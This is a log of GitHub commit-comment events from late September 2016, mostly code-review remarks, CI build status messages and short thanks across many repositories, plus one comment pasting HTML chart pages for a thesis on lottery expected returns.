{"id":"4633783864","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19215640,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-28T22:17:07Z","updated_at":"2016-09-28T22:17:07Z","body":"develop (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T22:17:07Z"}
{"id":"4633783979","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215641,"position":60,"line":128,"path":"javascript/features/killtime/killtime_manager.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-28T22:17:09Z","updated_at":"2016-09-28T22:17:09Z","body":"Why does this method end with an underscore?\r\n\r\nI think your intention here is to indicate visibility, i.e. the underscore suffix indicates that it's private. We don't really do that throughout our code. It doesn't seem great to only do that in certain places."}},"created_at":"2016-09-28T22:17:09Z"}
{"id":"4633788823","type":"CommitCommentEvent","actor":{"login":"cyan"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19215657,"position":null,"line":null,"path":null,"commit_id":"9b3927efc7aee1d836f099572f5be96ac5cac323","created_at":"2016-09-28T22:18:10Z","updated_at":"2016-09-28T22:18:10Z","body":"add this line (change the pokemons id with those you wish ^^)\r\n\r\nencounter-whitelist: [10,11,13,100,118,120]"}},"created_at":"2016-09-28T22:18:10Z"}
{"id":"4633790697","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19215659,"position":3,"line":3,"path":"src/scss/_mixins.scss","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-28T22:18:35Z","updated_at":"2016-09-28T22:18:35Z","body":"If there is no code for this file, we should remove it.  See also _variables.scss."}},"created_at":"2016-09-28T22:18:35Z"}
{"id":"4633793404","type":"CommitCommentEvent","actor":{"login":"mellery451"},"repo":{"name":"vinniefalco/Beast"},"payload":{"comment":{"id":19215663,"position":null,"line":null,"path":null,"commit_id":"4606961cef40eecf04d98aa6ad4aa5c9f46a425b","created_at":"2016-09-28T22:19:10Z","updated_at":"2016-09-28T22:19:10Z","body":"👍 "}},"created_at":"2016-09-28T22:19:10Z"}
{"id":"4633794016","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215664,"position":51,"line":117,"path":"javascript/features/killtime/killtime_manager.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-28T22:19:19Z","updated_at":"2016-09-28T22:19:19Z","body":"nit: no need for the `else`, the remainder of the function's control flow is the `else`.\r\nnit: don't return a value here (_null_), that'll hurt JIT optimisations since the other code path in the function does not return anything."}},"created_at":"2016-09-28T22:19:19Z"}
{"id":"4633794055","type":"CommitCommentEvent","actor":{"login":"MarshallOfSound"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19215665,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-28T22:19:19Z","updated_at":"2016-09-28T22:19:19Z","body":"Just chiming in here regarding Electron forks with differing version numbers\r\n\r\nI came across this issue once and it was super annoying to fix, I think we just gave up in the end and waited for the next Electron release to reach our version number and then never diverged version numbers again 😆 \r\n\r\nJust scanning for a config option in the users package.json\r\n\r\n```js\r\n\"config\": {\r\n  \"electronVersion\": \"87.23.1\"\r\n}\r\n```\r\n\r\nWould solve this problem and have no backwards compatibility issues.  Would that solve the issue on your side of things as well @bridiver "}},"created_at":"2016-09-28T22:19:19Z"}
{"id":"4633796631","type":"CommitCommentEvent","actor":{"login":"borisfom"},"repo":{"name":"NVIDIA/torch-cudnn"},"payload":{"comment":{"id":19215671,"position":36,"line":160,"path":"find.lua","commit_id":"156b7edc1d05d42f5e899481f8855a92eb9e41c1","created_at":"2016-09-28T22:19:54Z","updated_at":"2016-09-28T22:19:54Z","body":"Thanks for pointing this out - I have fixed that."}},"created_at":"2016-09-28T22:19:54Z"}
{"id":"4633800769","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19215679,"position":42,"line":42,"path":"test/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-28T22:20:45Z","updated_at":"2016-09-28T22:20:45Z","body":"We should write better unit tests that test main.js rather than component-owner.js.  We can discuss this further when you get back."}},"created_at":"2016-09-28T22:20:45Z"}
{"id":"4633800793","type":"CommitCommentEvent","actor":{"login":"turing54"},"repo":{"name":"turing54/proyecto1"},"payload":{"comment":{"id":19215680,"position":null,"line":null,"path":null,"commit_id":"90defa2b32ff0c13b8c84be76d3962923fd69ae2","created_at":"2016-09-28T22:20:46Z","updated_at":"2016-09-28T22:20:46Z","body":"sudo apt_get install gir"}},"created_at":"2016-09-28T22:20:46Z"}
{"id":"4633801650","type":"CommitCommentEvent","actor":{"login":"madmaxlax"},"repo":{"name":"madmaxlax/sistersbrewing"},"payload":{"comment":{"id":19215684,"position":null,"line":null,"path":null,"commit_id":"4e78b76ae5e3e13026d75b61b59ca9caa5e3b681","created_at":"2016-09-28T22:20:57Z","updated_at":"2016-09-28T22:20:57Z","body":"closes #1 "}},"created_at":"2016-09-28T22:20:57Z"}
{"id":"4633802727","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19215689,"position":null,"line":null,"path":null,"commit_id":"764897bced936b3f2f922b51585587dcde3e4ac5","created_at":"2016-09-28T22:21:11Z","updated_at":"2016-09-28T22:21:11Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 187](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1261&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-28T22:21:11Z"}
{"id":"4633806690","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19215696,"position":null,"line":null,"path":null,"commit_id":"764897bced936b3f2f922b51585587dcde3e4ac5","created_at":"2016-09-28T22:22:03Z","updated_at":"2016-09-28T22:22:03Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 187](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1261&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **FAILURE**\nSummary: Compilation error: Xbim.COBie\\Xbim.COBie.csproj (new); compilation error: Xbim.COBieLite\\Xbim.COBieLite.csproj (new); compilation error: Xbim.COBieLiteUK\\Xbim.COBieLiteUK.csproj (new) Build time: 00:00:46"}},"created_at":"2016-09-28T22:22:03Z"}
{"id":"4633812162","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19215713,"position":6,"line":6,"path":"translations/fr.json","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-28T22:23:13Z","updated_at":"2016-09-28T22:23:13Z","body":"Frenchified Latin?"}},"created_at":"2016-09-28T22:23:13Z"}
{"id":"4633818567","type":"CommitCommentEvent","actor":{"login":"danxshap"},"repo":{"name":"danxshap/django-rest-surveys"},"payload":{"comment":{"id":19215733,"position":21,"line":62,"path":"rest_surveys/serializers.py","commit_id":"ff227da56d36db182a574ee3b5805177de2b2bc7","created_at":"2016-09-28T22:24:36Z","updated_at":"2016-09-28T22:24:36Z","body":"@mkolodny did you consider using the m2m field directly here, taking advantage of the `Orderable` base class in the intermediary model, instead of querying the intermediary model & ordering manually?\r\n\r\ne.g. `response_options = obj.response_options.all()`\r\n\r\nIs the method name `get_response_options` a rest framework convention? I don't see it being used elsewhere in the code."}},"created_at":"2016-09-28T22:24:36Z"}
{"id":"4633832058","type":"CommitCommentEvent","actor":{"login":"tahoang"},"repo":{"name":"esrgc/whatsUp"},"payload":{"comment":{"id":19215773,"position":70,"line":71,"path":"helper/index.js","commit_id":"e0434b80b62398c4d9cc5913d2997785778b2889","created_at":"2016-09-28T22:27:36Z","updated_at":"2016-09-28T22:27:36Z","body":"@johntalbot1215 I moved this into the export object. Otherwise, it won't be available in module when it exports"}},"created_at":"2016-09-28T22:27:36Z"}
{"id":"4633836930","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"rstats-db/DBI"},"payload":{"comment":{"id":19215779,"position":32,"line":44,"path":"man/DBIspec.Rd","commit_id":"a9277a4f5a4187ef5f515c9288d9ad12c7ed7a52","created_at":"2016-09-28T22:28:43Z","updated_at":"2016-09-28T22:28:43Z","body":"The new braces here seem wrong."}},"created_at":"2016-09-28T22:28:43Z"}
{"id":"4633849089","type":"CommitCommentEvent","actor":{"login":"nkhalaieff"},"repo":{"name":"nkhalaieff/fin4ds"},"payload":{"comment":{"id":19215805,"position":104,"line":62,"path":"print_resi.sql","commit_id":"48a30355c23cd1506d60eed011f1057108af8b92","created_at":"2016-09-28T22:31:30Z","updated_at":"2016-09-28T22:31:30Z","body":"You need to move the AND campaign_id != -1 down and move the semicolon down"}},"created_at":"2016-09-28T22:31:30Z"}
{"id":"4633853753","type":"CommitCommentEvent","actor":{"login":"rwaldron"},"repo":{"name":"bocoup/reconbot"},"payload":{"comment":{"id":19215812,"position":15,"line":15,"path":"lib/mdns.js","commit_id":"6759535fb0a22286eefee0af65e4eb58acedd043","created_at":"2016-09-28T22:32:34Z","updated_at":"2016-09-28T22:32:34Z","body":"👍 "}},"created_at":"2016-09-28T22:32:34Z"}
{"id":"4633861248","type":"CommitCommentEvent","actor":{"login":"harveylowndes"},"repo":{"name":"harveylowndes/gallery"},"payload":{"comment":{"id":19215823,"position":null,"line":null,"path":null,"commit_id":"0c1dcdad8ad3bc792f02d7f2390ce28d24d96b9d","created_at":"2016-09-28T22:34:16Z","updated_at":"2016-09-28T22:34:16Z","body":"Complete rewrite of code, still requires better commenting."}},"created_at":"2016-09-28T22:34:16Z"}
{"id":"4633863570","type":"CommitCommentEvent","actor":{"login":"gregorybesson"},"repo":{"name":"TheAlphaNerd/changelog-maker"},"payload":{"comment":{"id":19215833,"position":null,"line":null,"path":null,"commit_id":"25c3eacf7fe77eeba86ba52d85f7208a67ea4171","created_at":"2016-09-28T22:34:49Z","updated_at":"2016-09-28T22:34:49Z","body":"Hello Myles, what a little planet !\r\nCould you consider submitting this commit as a PR ? \r\nThis one seems rather valuable to the project\r\n\r\nGreg from Adfab (France)"}},"created_at":"2016-09-28T22:34:49Z"}
{"id":"4633868237","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19215841,"position":131,"line":1328,"path":"js/battledata.js","commit_id":"5c3fd929d19f08b47bfb57756537c2e00d6a9829","created_at":"2016-09-28T22:35:54Z","updated_at":"2016-09-28T22:35:54Z","body":"This is badly indented, but why did it take nearly a year for eslint to realize this???????"}},"created_at":"2016-09-28T22:35:54Z"}
{"id":"4633869439","type":"CommitCommentEvent","actor":{"login":"psolaimani"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19215844,"position":17,"line":101,"path":"tests/src/testgen/gen.R","commit_id":"47fa5260e7c819e087a70f483ff2a4ca96b98c49","created_at":"2016-09-28T22:36:11Z","updated_at":"2016-09-28T22:36:11Z","body":"you mean \r\n```\r\neval(set.seed(1), envir = .GlobalEnv)\r\n```"}},"created_at":"2016-09-28T22:36:11Z"}
{"id":"4633870132","type":"CommitCommentEvent","actor":{"login":"turing54"},"repo":{"name":"turing54/proyecto1"},"payload":{"comment":{"id":19215847,"position":null,"line":null,"path":null,"commit_id":"90defa2b32ff0c13b8c84be76d3962923fd69ae2","created_at":"2016-09-28T22:36:20Z","updated_at":"2016-09-28T22:36:20Z","body":"TFM por Rafael Aparicio Grávalos. Aplicacíon Big Data a la Lotería Primitiva. Código javascript de las Figuras que se detallan\r\nFigura 3.9\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <style>\r\n  body{\r\nbackground-color:#d0e4fe;\r\n}\r\nh1{\r\ncolor:orange;\r\ntext-align:center;\r\n}\r\np{\r\nfont-family:\"Times New Roman\";\r\nfont-size:20px;\r\n} </style>\r\n  <script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.min.js\"></script>\r\n<script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.min.js\"></script>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.css\" />\r\n<script type=\"text/javascript\">\r\n\r\n\r\n$(document).ready(function(){\r\n$.jqplot('chartdiv', [[[1, 0.7126362],[2, 0.2986515],[3,-0.1174323],[4,-0.5305997],[5,-0.9460499]]]);\r\n});\r\n</script>\r\n</head>\r\n<body>\r\n  <h1> Eje Y=Beneficio Esperado</h1>\r\n<div id=\"chartdiv\" style=\"height:400px;width:500px;\"></div>\r\n\r\n\r\n\r\n<h1> Eje X=Porcentajes</h1>\r\n</body>\r\n</html>\r\nFigura 3.13\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <style>\r\n  body{\r\nbackground-color:#d0e4fe;\r\n}\r\nh1{\r\ncolor:orange;\r\ntext-align:center;\r\n}\r\np{\r\nfont-family:\"Times New Roman\";\r\nfont-size:20px;\r\n} </style>\r\n  <script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.min.js\"></script>\r\n<script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.min.js\"></script>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.css\" />\r\n<script type=\"text/javascript\">\r\n\r\n\r\n$(document).ready(function(){\r\n$.jqplot('chartdiv', [[[1, 0.9547648],[2, 0.5504211],[3,0.1310086],[4,-0.2752966],[5,-0.6908499]]]);\r\n});\r\n</script>\r\n</head>\r\n<body>\r\n  <h1> Eje Y=Beneficio Esperado</h1>\r\n<div id=\"chartdiv\" style=\"height:400px;width:500px;\"></div>\r\n\r\n\r\n\r\n<h1> Eje X=Porcentajes</h1>\r\n</body>\r\n</html>\r\nFigura 3.17\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <style>\r\n  body{\r\nbackground-color:#d0e4fe;\r\n}\r\nh1{\r\ncolor:orange;\r\ntext-align:center;\r\n}\r\np{\r\nfont-family:\"Times New Roman\";\r\nfont-size:20px;\r\n} </style>\r\n  <script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.min.js\"></script>\r\n<script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.min.js\"></script>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.css\" />\r\n<script type=\"text/javascript\">\r\n\r\n\r\n$(document).ready(function(){\r\n$.jqplot('chartdiv', [[[1,  1.21182656 ],[2, 0.80089344],[3,0.38688512 ],[4,-0.03029696 ],[5, -0.44278784]]]);\r\n});\r\n</script>\r\n</head>\r\n<body>\r\n  <h1> Eje Y=Beneficio Esperado</h1>\r\n<div id=\"chartdiv\" style=\"height:400px;width:500px;\"></div>\r\n\r\n\r\n\r\n<h1> Eje X=Porcentajes</h1>\r\n</body>\r\n</html>\r\nFigura 3.21\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <style>\r\n  body{\r\nbackground-color:#d0e4fe;\r\n}\r\nh1{\r\ncolor:orange;\r\ntext-align:center;\r\n}\r\np{\r\nfont-family:\"Times New Roman\";\r\nfont-size:20px;\r\n} </style>\r\n  <script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.min.js\"></script>\r\n<script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.min.js\"></script>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.css\" />\r\n<script type=\"text/javascript\">\r\n\r\n\r\n$(document).ready(function(){\r\n$.jqplot('chartdiv', [[[1,1.4581530 ],[2, 1.0482829],[3,0.6322355 ],[4, 0.2188589 ],[5, -0.1926886 ]]]);\r\n});\r\n</script>\r\n</head>\r\n<body>\r\n  <h1> Eje Y=Beneficio Esperado</h1>\r\n<div id=\"chartdiv\" style=\"height:400px;width:500px;\"></div>\r\n<h1> Eje X=Porcentajes</h1>\r\n</body>\r\n</html>\r\nFigura 3.25\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <style>\r\n  body{\r\nbackground-color:#d0e4fe;\r\n}\r\nh1{\r\ncolor:orange;\r\ntext-align:center;\r\n}\r\np{\r\nfont-family:\"Times New Roman\";\r\nfont-size:20px;\r\n} </style>\r\n  <script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.min.js\"></script>\r\n<script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.min.js\"></script>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.css\" />\r\n<script type=\"text/javascript\">\r\n$(document).ready(function(){\r\n$.jqplot('chartdiv', [[[1,1.70827008 ],[2,1.29497408],[3,0.88739328 ],[4, 0.46933888],[5,0.05943872 ]]]);\r\n});\r\n</script>\r\n</head>\r\n<body>\r\n  <h1> Eje Y=Beneficio Esperado</h1>\r\n<div id=\"chartdiv\" style=\"height:400px;width:500px;\"></div>\r\n<h1> Eje X=Porcentajes</h1>\r\n</body>\r\n</html>\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <style>\r\n  body{\r\nbackground-color:#d0e4fe;\r\n}\r\nh1{\r\ncolor:orange;\r\ntext-align:center;\r\n}\r\np{\r\nfont-family:\"Times New Roman\";\r\nfont-size:20px;\r\n} </style>\r\n  <script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.min.js\"></script>\r\n<script language=\"javascript\" type=\"text/javascript\" src=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.min.js\"></script>\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"http://rd.unir.net/jlsantos/jquery/jqplot/jquery.jqplot.css\" />\r\n<script type=\"text/javascript\">\r\n\r\n\r\n$(document).ready(function(){\r\n$.jqplot('chartdiv', [[[1,1.70827008 ],[2,1.29497408],[3,0.88739328 ],[4, 0.46933888],[5,0.05943872 ]]]);\r\n});\r\n</script>\r\n</head>\r\n<body>\r\n  <h1> Eje Y=Beneficio Esperado</h1>\r\n<div id=\"chartdiv\" style=\"height:400px;width:500px;\"></div>\r\n\r\n\r\n\r\n<h1> Eje X=Porcentajes</h1>\r\n</body>\r\n</html>\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-28T22:36:20Z"}
{"id":"4633875057","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-lib-monitor"},"payload":{"comment":{"id":19215859,"position":null,"line":null,"path":null,"commit_id":"9f8bad1e26bca669b6523d84b51bff4d52ac4ec8","created_at":"2016-09-28T22:37:28Z","updated_at":"2016-09-28T22:37:28Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Vaah_1OKTk66aFoU4ANefA"}},"created_at":"2016-09-28T22:37:28Z"}
{"id":"4633880863","type":"CommitCommentEvent","actor":{"login":"jmmk"},"repo":{"name":"zauberlabs/gnip4j"},"payload":{"comment":{"id":19215877,"position":5,"line":44,"path":"core/src/main/java/com/zaubersoftware/gnip4j/api/impl/PowerTrackV2UriStrategy.java","commit_id":"dc89a6de3b290198a77fb9cd31e3cd4380576fb7","created_at":"2016-09-28T22:38:49Z","updated_at":"2016-09-28T22:38:49Z","body":"@jcodagnone it looks like there's an extra `/` in there"}},"created_at":"2016-09-28T22:38:49Z"}
{"id":"4633893995","type":"CommitCommentEvent","actor":{"login":"rnewby"},"repo":{"name":"nightscout/cgm-remote-monitor"},"payload":{"comment":{"id":19215895,"position":null,"line":null,"path":null,"commit_id":"0500bc01ced66d891f2c8240ce7ad0dcb1868572","created_at":"2016-09-28T22:41:40Z","updated_at":"2016-09-28T22:41:40Z","body":"0.8.5 hopefully in the right direction now"}},"created_at":"2016-09-28T22:41:40Z"}
{"id":"4633906064","type":"CommitCommentEvent","actor":{"login":"smudge"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19215924,"position":null,"line":null,"path":null,"commit_id":"49c4af43ec5819d8f5c1a91f9b84296c927ce6e7","created_at":"2016-09-28T22:44:24Z","updated_at":"2016-09-28T22:44:24Z","body":"@tobymurray-nanometrics - I responded to your StackOverflow question.\r\n\r\nSomeone should lock this thread. Future visitors - refer to the comments above and to that SO question, as well as [this one](http://stackoverflow.com/questions/16406204/why-did-rails4-drop-support-for-assets-group-in-the-gemfile#17221248)."}},"created_at":"2016-09-28T22:44:24Z"}
{"id":"4633906736","type":"CommitCommentEvent","actor":{"login":"jorexe"},"repo":{"name":"kevinkraus92/pod-rmi-async"},"payload":{"comment":{"id":19215928,"position":17,"line":17,"path":"client/src/main/java/itba/pod/client/ClientHandleImpl.java","commit_id":"693ff5f11a7f8c6b8a65753e0989787ebaa826b9","created_at":"2016-09-28T22:44:34Z","updated_at":"2016-09-28T22:44:34Z","body":"Favor de borrar esta linea, no cumple con los estándares de estilo publicados en la plantilla de estilos de google.\r\n\r\nhttps://google.github.io/styleguide/javaguide.html"}},"created_at":"2016-09-28T22:44:34Z"}
{"id":"4633911599","type":"CommitCommentEvent","actor":{"login":"kmonson"},"repo":{"name":"zbeech/volttron"},"payload":{"comment":{"id":19215942,"position":null,"line":null,"path":null,"commit_id":"176034fff6eb40081e8b22e7874311576b06c9d5","created_at":"2016-09-28T22:45:36Z","updated_at":"2016-09-28T22:45:36Z","body":"I think you messed up the case of KeyStore on line 13."}},"created_at":"2016-09-28T22:45:36Z"}
{"id":"4633915977","type":"CommitCommentEvent","actor":{"login":"miiGit"},"repo":{"name":"miiGit/ASP.net-Basic-Web-Page"},"payload":{"comment":{"id":19215947,"position":null,"line":null,"path":null,"commit_id":"61bc3111b1456b19803c40e6b9e7ea7351bdc1f3","created_at":"2016-09-28T22:46:30Z","updated_at":"2016-09-28T22:46:30Z","body":"git@gist.github.com:5bfa9824cc3ecb0007d8e6b86ecf314b.git"}},"created_at":"2016-09-28T22:46:30Z"}
{"id":"4633918491","type":"CommitCommentEvent","actor":{"login":"CallumGill"},"repo":{"name":"operationzombie/apache-base"},"payload":{"comment":{"id":19215951,"position":5,"line":62,"path":"apache_flask.py","commit_id":"d1fe8edd665728ab4437f162236a3e865a94942c","created_at":"2016-09-28T22:47:02Z","updated_at":"2016-09-28T22:47:02Z","body":"There shouldn't be a closed bracket. But is this even from my commit?"}},"created_at":"2016-09-28T22:47:02Z"}
{"id":"4633921009","type":"CommitCommentEvent","actor":{"login":"adolfoperico"},"repo":{"name":"adolfoperico/test"},"payload":{"comment":{"id":19215960,"position":null,"line":null,"path":null,"commit_id":"6ed73f52a8484579c4c3b32bae7c108b3d454587","created_at":"2016-09-28T22:47:36Z","updated_at":"2016-09-28T22:47:36Z","body":"Viendo que se puede hacer con esto "}},"created_at":"2016-09-28T22:47:36Z"}
{"id":"4633923167","type":"CommitCommentEvent","actor":{"login":"freelumpia"},"repo":{"name":"Lupo-CPE315-Fall16/cpe-315-fall-2016-lab-1-freelumpia"},"payload":{"comment":{"id":19215964,"position":null,"line":null,"path":null,"commit_id":"30eaa47d1513ae44c303100d01e65cb0202e49e6","created_at":"2016-09-28T22:48:02Z","updated_at":"2016-09-28T22:48:02Z","body":"Marcel Perez, mbperez@calpoly.edu\r\nProf. Lupo, CPE 315-07\r\nLab 01"}},"created_at":"2016-09-28T22:48:02Z"}
{"id":"4633924292","type":"CommitCommentEvent","actor":{"login":"freelumpia"},"repo":{"name":"Lupo-CPE315-Fall16/cpe-315-fall-2016-lab-1-freelumpia"},"payload":{"comment":{"id":19215968,"position":null,"line":null,"path":null,"commit_id":"2ea69fadf8fe93d30224c831eb618ee5aa24e998","created_at":"2016-09-28T22:48:18Z","updated_at":"2016-09-28T22:48:18Z","body":"Marcel Perez, mbperez@calpoly.edu\r\nProf. Lupo, CPE 315-07\r\nLab 01"}},"created_at":"2016-09-28T22:48:18Z"}
{"id":"4633930757","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19215979,"position":null,"line":null,"path":null,"commit_id":"b78400793601763c2a1c18753977e1fc32053429","created_at":"2016-09-28T22:49:39Z","updated_at":"2016-09-28T22:49:39Z","body":"aka the \"You want to serve your site to millions of people? With that it's possible. And even if you don't, the server now won't freeze anymore.\" update."}},"created_at":"2016-09-28T22:49:39Z"}
{"id":"4633935732","type":"CommitCommentEvent","actor":{"login":"mcailotto"},"repo":{"name":"Lupo-CPE315-Fall16/cpe-315-fall-2016-lab-1-mcailotto"},"payload":{"comment":{"id":19215989,"position":null,"line":null,"path":null,"commit_id":"a4a39d43326433edacc4598a35dd5470454f1f7a","created_at":"2016-09-28T22:50:46Z","updated_at":"2016-09-28T22:50:46Z","body":"piku.s"}},"created_at":"2016-09-28T22:50:46Z"}
{"id":"4633937305","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19215996,"position":null,"line":null,"path":null,"commit_id":"ee970c1f5604082c46aa67f8da3f5debed3992a2","created_at":"2016-09-28T22:51:08Z","updated_at":"2016-09-28T22:51:08Z","body":"(Reported in this replay)\r\n\r\nhttp://replay.pokemonshowdown.com/bhdoubles-437375004"}},"created_at":"2016-09-28T22:51:08Z"}
{"id":"4633938290","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19215999,"position":159,"line":159,"path":"Assets/PositionControllers.cs","commit_id":"3fa0ea3aadd6d86803d443d27f73160511db5549","created_at":"2016-09-28T22:51:21Z","updated_at":"2016-09-28T22:51:21Z","body":"В Update значения обновляются как value * Time.deltaTime. количество и время вызова Update не детерминировано, это приводит к недетерминированному поведению.\r\nВ данном случае timeXAction нужно уменьшить в 60 раз (1) и прибавлять counterXAction + Time.deltaTime."}},"created_at":"2016-09-28T22:51:21Z"}
{"id":"4633939974","type":"CommitCommentEvent","actor":{"login":"lostick"},"repo":{"name":"2factorauth/twofactorauth"},"payload":{"comment":{"id":19216004,"position":null,"line":null,"path":null,"commit_id":"6d6d58f52ce4959ae15782cb562672a67c1928a0","created_at":"2016-09-28T22:51:47Z","updated_at":"2016-09-28T22:51:47Z","body":"cheers mate"}},"created_at":"2016-09-28T22:51:47Z"}
{"id":"4633940449","type":"CommitCommentEvent","actor":{"login":"MintonJ"},"repo":{"name":"MintonJ/Personal-Project"},"payload":{"comment":{"id":19216006,"position":null,"line":null,"path":null,"commit_id":"7fea4e3c44f47c1d1a9a4eecaeeb7014926cbb37","created_at":"2016-09-28T22:51:54Z","updated_at":"2016-09-28T22:51:54Z","body":"Thanks for the help!"}},"created_at":"2016-09-28T22:51:54Z"}
{"id":"4633942733","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"TheAlphaNerd/changelog-maker"},"payload":{"comment":{"id":19216012,"position":null,"line":null,"path":null,"commit_id":"25c3eacf7fe77eeba86ba52d85f7208a67ea4171","created_at":"2016-09-28T22:52:24Z","updated_at":"2016-09-28T22:52:24Z","body":"it has been. we were distracted by lots of things but will try and get it through soon. "}},"created_at":"2016-09-28T22:52:24Z"}
{"id":"4633943925","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"TheAlphaNerd/changelog-maker"},"payload":{"comment":{"id":19216016,"position":null,"line":null,"path":null,"commit_id":"25c3eacf7fe77eeba86ba52d85f7208a67ea4171","created_at":"2016-09-28T22:52:41Z","updated_at":"2016-09-28T22:52:41Z","body":"we should catch up! excited to hear you are using this tool "}},"created_at":"2016-09-28T22:52:41Z"}
{"id":"4633949178","type":"CommitCommentEvent","actor":{"login":"stephengroat"},"repo":{"name":"2factorauth/twofactorauth"},"payload":{"comment":{"id":19216032,"position":null,"line":null,"path":null,"commit_id":"6d6d58f52ce4959ae15782cb562672a67c1928a0","created_at":"2016-09-28T22:53:49Z","updated_at":"2016-09-28T22:53:49Z","body":"thanks for that catch too!"}},"created_at":"2016-09-28T22:53:49Z"}
